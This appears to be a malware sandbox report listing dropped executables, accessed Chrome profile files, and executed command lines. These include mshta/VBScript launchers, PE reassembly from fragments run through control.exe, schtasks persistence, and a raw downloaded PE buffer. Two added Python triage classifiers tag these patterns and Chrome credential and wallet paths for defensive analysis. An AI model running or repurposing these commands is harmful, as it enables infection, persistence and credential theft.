file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-615EB71C-C20.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\4532e9ed-376c-41b6-8ead-bdd325a6cfae.dmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\background.html
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F2CDF32-998.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
domain ipinfo.io
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
file C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
file C:\Users\test22\Documents\5mtQoaCdFoT9WiAeXXqhQNJK.dll
file C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
file C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
file C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
file C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
file C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe
file C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
file C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
file C:\Users\test22\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\_isetup\_shfoldr.dll
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
file C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
file C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
file C:\Users\test22\AppData\Local\Temp\25-c4647-5ce-46289-077b3ce9ed0d6\Nygaefoqypu.exe
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\Adam.exe
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
file C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
file C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline C:\Windows\system32\cmd.exe /S /D /c" EChO "
cmdline "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
cmdline C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
cmdline C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline Cmd.exe /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
cmdline "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
cmdline MSHTa.Exe vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
cmdline cmd.exe /c taskkill /f /im chrome.exe
cmdline "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
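Added example (not code from the report): a Python triage helper that case-folds command lines like the ones above and tags the patterns visible in them: the mshta vbscript: wrapper around WScript.Shell.Run, the echo | set /p "MZ" plus copy /b reassembly of a PE from fragments that are then deleted with del /Q *, control.exe being handed a file that is not a .cpl, the schtasks entries with /rl HIGHEST, the copy-then-start relaunch under a new name, and the taskkill of chrome.exe. The four sample command lines are copied from the report; the rule names are the example's own.

```python
import re

# Command lines copied from the report above (the mixed case is the sample's own).
REPORT_CMDLINES = [
    r'MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )',
    r'"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *',
    r'schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST',
    r'cmd.exe /c taskkill /f /im chrome.exe',
]

def normalize(cmdline):
    """Case-fold and collapse whitespace so mixed-case LOLBin spellings compare equal."""
    return re.sub(r'\s+', ' ', cmdline).strip().lower()

# Every pattern in a rule must match the normalized line. Rule names are this example's own.
RULES = {
    'mshta_vbscript_proxy': [r'\bmshta(?:\.exe)?\b', r'vbscript:',
                             r'createobject\s*\(\s*"wscript\.shell"', r'\.run\s*\('],
    'pe_header_assembled_from_fragments': [r'set\s*/p\s*=\s*"mz"', r'copy\s+/b\b'],
    'fragments_deleted': [r'del\s+/q\s+\*'],
    'scheduled_task_highest_rl': [r'schtasks\s+/create', r'/rl\s+highest'],
    'browser_killed': [r'taskkill\s+/f\s+/im\s+chrome\.exe'],
    # copy to a new name, then start that same name (identical after case-folding)
    'self_copy_and_relaunch': [r'copy\s+/y\s+"+[^"]*"+\s+(\S+)\s*&&\s*start\s+\1(?:\s|$)'],
}

def classify(cmdline):
    n = normalize(cmdline)
    tags = [name for name, pats in RULES.items() if all(re.search(p, n) for p in pats)]
    # control.exe normally loads a .cpl; anything else is a DLL payload proxied through it
    m = re.search(r'\bcontrol\.exe\s+(\S+)', n)
    if m and not m.group(1).endswith('.cpl'):
        tags.append('control_exe_loads_non_cpl')
    return sorted(tags)

def triage(cmdlines):
    """Map each command line to its tags, dropping lines that trip no rule."""
    return {c: t for c in cmdlines for t in [classify(c)] if t}
```

Case-folding first is what makes the rules short: the report's MSHtA.eXE, MSHTa.Exe and "C:\Windows\System32\mshta.exe" spellings all collapse to the same token, and the doubled quotes inside the VBScript string are tolerated by matching one or more quote characters rather than exactly one.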
file C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
file C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
file C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
file C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
file C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
file C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
file C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
file C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
file C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
file C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
file C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
file C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\Adam.exe
file C:\Users\test22\AppData\Local\Temp\QVNGp.I
file C:\Users\test22\AppData\Local\Temp\is-1PC33.tmp\Gul5rTCKpjXo0MogByz6Rjtk.tmp
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\_isetup\_shfoldr.dll
file C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll
file C:\Users\test22\AppData\Local\Temp\is-3QENA.tmp\pImS5RWnyPoH71MUnlZxfr7l.tmp
file C:\Users\test22\AppData\Local\Temp\25-c4647-5ce-46289-077b3ce9ed0d6\Nygaefoqypu.exe
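Added example (not code from the report) covering the two file lists above: a Python classifier for the accessed paths that separates Chrome's secret stores (Login Data, Cookies, Web Data and Local State, the last holding the DPAPI-wrapped key that decrypts the others) from extension data keyed by the 32-character a-p extension ID, Inno Setup's is-XXXXX.tmp unpack directories, and PE files written under user-writable or Program Files locations. Ten paths are copied from the report; the mapping of nkbihfbeogaeaoehlefnkodbefgpgknn to MetaMask is that extension's published store ID, and the category names are the example's own.

```python
import re
from collections import Counter

# Ten paths copied from the two file lists above.
REPORT_PATHS = [
    r'C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data',
    r'C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies',
    r'C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State',
    r'C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn',
    r'C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js',
    r'C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom',
    r'C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe',
    r'C:\Users\test22\Documents\5mtQoaCdFoT9WiAeXXqhQNJK.dll',
    r'C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll',
    r'C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe',
]

CHROME_SECRET_FILES = {'login data', 'cookies', 'web data', 'local state'}
# Chrome extension IDs are 32 characters drawn from a-p
EXTENSION_ID = re.compile(r'\\(?:extensions|local extension settings)\\([a-p]{32})(?:\\|$)')
# Inno Setup unpacks into %TEMP%\is-XXXXX.tmp before running the installer
INNO_TEMP = re.compile(r'\\temp\\is-[a-z0-9]{5}\.tmp\\')
KNOWN_WALLET_EXTENSIONS = {'nkbihfbeogaeaoehlefnkodbefgpgknn': 'MetaMask'}  # published store ID

def classify_path(path):
    p = path.lower()
    name = p.rsplit('\\', 1)[-1]
    if '\\google\\chrome\\user data\\' in p:
        if name in CHROME_SECRET_FILES:
            return 'chrome_secret_store'
        m = EXTENSION_ID.search(p)
        if m:
            return 'chrome_extension_data:' + m.group(1)
        return 'chrome_other'
    if INNO_TEMP.search(p):
        return 'inno_setup_unpack'
    if name.endswith(('.exe', '.dll')):
        if p.startswith('c:\\users\\'):
            return 'pe_in_user_dir'
        if p.startswith('c:\\program files'):
            return 'pe_in_program_files'
    return 'other'

def summarize(paths):
    """Counts per category, with extension IDs folded into one bucket."""
    return dict(Counter(classify_path(p).split(':', 1)[0] for p in paths))

def extension_ids(paths):
    return {c.split(':', 1)[1] for c in map(classify_path, paths)
            if c.startswith('chrome_extension_data:')}

def wallet_extensions_touched(paths):
    return sorted(KNOWN_WALLET_EXTENSIONS[i] for i in extension_ids(paths)
                  if i in KNOWN_WALLET_EXTENSIONS)
```

Reading Login Data and Cookies together with Local State is the combination a Chrome credential stealer needs (the SQLite rows are useless without the key in Local State), and a non-browser process touching a wallet extension's Local Extension Settings directory is the file-level trace behind the report's BitCoin tag.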
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "L_0PQ1nH1s1hf_DH8W5V8AUl.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
parameters: /mixtwo
filepath: C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
parameters: silent
filepath: C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: Cmd.exe
parameters: /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
filepath: Cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $xXUû<9;¨<9;¨<9;¨(R8©69;¨(R>©¯9;¨(R?©.9;¨7V?©-9;¨7V8©*9;¨7V>©9;¨(R:©?9;¨<9:¨a9;¨úV2©?9;¨úVĨ=9;¨<9¬¨=9;¨úV9©=9;¨Rich<9;¨PEL?~Xaà `Ø@Šp@`@Á Ö(86@äLÃhÃ@p,.textŸ_` `.rdataºlpnd@@.dataøà Ò@À.rsrc868Ü@@.relocä@@BU‹ìh¨ÁB¹0õBè^ÍhpoBèkwƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌS‹ÜƒìƒäðƒÄU‹k‰l$‹ìì¡àB3ʼnEü3ÀˆEß3ɈMÞ3҈U݊E߈E؊MވMԊU݈UÐÇE¸´Iž;ÇE¼3ÓÁ.‹E¸‰E ‹M¼‰M¤ÇE°æ¡!ÇE´¾ÄK‹U°‰U¨‹E´‰E¬M ‰MÈÇEà…zž;ÇEä3ÓÁ.ÇEèæ¡!ÇEì¾ÄK3҈U܊E܈EÌ(Eà)E€‹MÈ)E(EfïE€)…pÿÿÿ(…pÿÿÿ‹UÈ‹EȉEċMÄQ¹õBèÓh€oBèbvƒÄ‹Mü3ÍèØs‹å]‹ã[ÃÌÌÌÌÌÌÌU‹ìh¨ÁB¹HõBèÌhoBè+vƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì¸`õB]ÃÌÌÌÌÌÌU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüƒÀP‹MƒÁQ脃ċEü‹å]ÂÌÌÌÌU‹ìƒì‰Mü‹Eüƒxt ‹Mü‹Q‰UøëÇEø<ÁB‹Eø‹å]ÃÌÌÌÌÌU‹ìQ‰Mü‹EüÇôrB‹MüƒÁQè „ƒÄ‹Uƒâtj ‹EüPèzuƒÄ‹Eü‹å]ÂÌÌU‹ìQ‰Mü‹EüÇôrB‹MüƒÁQèʃƒÄ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüÇ@PÁB‹MüÇsB‹UüÇìvB‹Eü‹å]ÃU‹ìƒì Môè²ÿÿÿhôÕBEôP跇‹å]ÃU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüƒÀP‹MƒÁQèƒċUüÇsB‹EüÇìvB‹Eü‹å]ÂÌÌU‹ìQ‰Mü‹EüÇôrB3ɋUüƒÂ‰ ‰J‹EüƒÀP‹MƒÁQès‚ƒÄ‹UüÇsB‹Eü‹å]ÂÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‰Uø‰Mü‹Eø‹ƒÁ#‹Uø‰ ‹Eü‹‰MìºkÂÿ‹M싉UðÇEè‹Eü‹+Mð‰Môƒ}ôrƒ}ô#wë 蜴3Òu÷3Àuå‹Mü‹Uð‰‹å]ÃÌÌÌÌÌU‹ìƒì0V‹E‰Eø‹M ‰Mü‹Uø‹Eü‰Uð‰Eô‹Mð Môu‹Uø‹EüƒÂ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: rSÑ<¡ö?ÀЈ:G‘ö?hhö?g6Ÿqö?ù"Qjìaö?£J;…ORö?d! YÈBö?ÞÀŠ¸V3ö?@bwú#ö?”®1h³ö?X`ö?ü-)4döõ?çи[çõ?¥âìÃgØõ?W“+ˆÉõ?‘úGƼºõ?ÀZk¬õ?ªÌ#ñaõ?íX0Ҏõ?`XV€õ?:kP<íqõ?âR|º—cõ?UUUUUUõ?þ‚»æ%Gõ?ëôH 9õ?K¨Vÿ*õ?øâêõ?ÅÄá"õ?PPõ?›LÝbóô?9/§àåô?L,ܾCØô?n¯%‡¸Êô?ᏦÝ>½ô?[¿R Ö¯ô?Jv­¢ô?gвã9•ô?€H"ˆô?{®Gázô?f`Y4Îmô?šÏõÇË`ô?ÊvÇâÙSô?ûÙbeøFô?Mî«0':ô?‡Õ%f-ô?QY^&µ ô?ô?feтô?û°?ûó?¯¥Bîó?©ä¼,âó?Æuª‘ÙÕó?ç«{¤•Éó?U)#Ù`½ó?;±;±ó?"Èz8$¥ó?c,™ó?ŽfÓ"ó?88ó?îEÉÑ[uó?HÞóió?ø*Ÿ_Î]ó?Áx+ûRó?Fà¬yFó?²¼W[ä:ó?újí\/ó?¿+Jã#ó?¶ëéXwó?Ñ0 ó?`Ä*Èó?h/¡½„öò?KÑþ¡Nëò?—€KÀ%àò? P- Õò? ,MûÉò?7ZŽù¾ò?@+­´ò?Áó’©ò?žä)Ažò?¥¸[r“ò?°ˆ°ˆò?MΡ8ú}ò?5'¸Psò?'Ö|³hò?ñ’€p"^ò?²w‘~Sò?’$I’$Iò?[`—·>ò?ß¼šxV4ò?* "*ò?xû!·ò?æUH€yò?ÙÀg G ò?  ò?pÁ}÷ñ?L¸<ôìñ?t¸?;ïâñ?½J.gõØñ?¢­Ïñ?Yàü"Åñ?)íF@J»ñ?ãºòg|±ñ?–{a¹§ñ?žàžñ?œ¢Œ€S”ñ?Û+ƒ°Šñ?ñ?„ÖŠwñ?ysB‰nñ?2üPdñ? 'u_[ñ?ÉÕý£¹Qñ?;Í 